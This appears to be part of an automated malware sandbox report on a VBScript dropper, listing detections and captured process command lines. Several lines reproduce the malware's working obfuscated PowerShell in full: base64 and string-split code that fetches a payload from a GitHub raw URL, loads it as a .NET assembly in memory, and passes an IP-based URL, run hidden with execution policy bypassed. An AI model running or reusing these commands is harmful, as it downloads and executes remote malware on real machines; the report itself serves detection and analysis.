Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: n.pdbQ source: powershell.exe, 00000004.00000002.2420242779.00000207432BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000004.00000002.2427497580.00007FFE168A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJys", "0", "false");
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Obfuscated command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')"Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFE16652817 push esp; iretd 2_2_00007FFE1665281A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE16647937 push ebx; retf 4_2_00007FFE1664793A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE166464FF push esp; iretd 4_2_00007FFE16646502
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE166408FB push E95B5E1Ch; ret 4_2_00007FFE16640909
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE16717531 push eax; ret 4_2_00007FFE16717532
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
